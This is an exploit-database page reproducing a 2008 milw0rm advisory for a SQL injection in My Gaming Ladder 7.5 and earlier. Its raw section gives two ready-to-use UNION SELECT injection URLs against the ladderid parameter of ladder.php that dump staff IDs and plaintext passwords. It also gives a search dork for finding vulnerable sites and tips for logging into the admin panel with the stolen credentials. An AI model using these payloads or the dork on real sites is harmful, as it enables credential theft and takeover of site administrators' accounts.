header-logo
Suggest Exploit
vendor:
My Gaming Ladder
by:
t0pP8uZz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: My Gaming Ladder
Affected Version From: 7.5 and prior
Affected Version To: 7.5 and prior
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys

My Gaming Ladder 7.5 and prior versions are vulnerable to SQL injection attacks. An attacker can exploit this vulnerability to gain access to the admin/user information stored in the database. The exploit involves sending a specially crafted SQL query to the vulnerable parameter 'ladderid' in the 'ladder.php' script. The query will return the admin/user information in plaintext. The admin login is located at '/adminhome.php' and the passwords are in plaintext.

Mitigation:

Upgrade to the latest version of My Gaming Ladder.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys	     +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz
SITE: www.mygamingladder.com
DORK (altavista.com/googles): "Ladder Scripts by"


DESCRIPTION: 
pull admin/user info from the database


EXPLOITS:
ADMINS/STAFF: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,id,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*

USERS: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,alias,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*


NOTE/TIP: 
admin login is at "/adminhome.php"
passwords are in plaintext
once you have visited the injection, scroll down and you will see all user/passwords in RED text.

you must login to admincp with the admin ID this is the number next to the password.


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+		My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys	     +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-07]

Navigation

Suggest Exploit

Services By CQR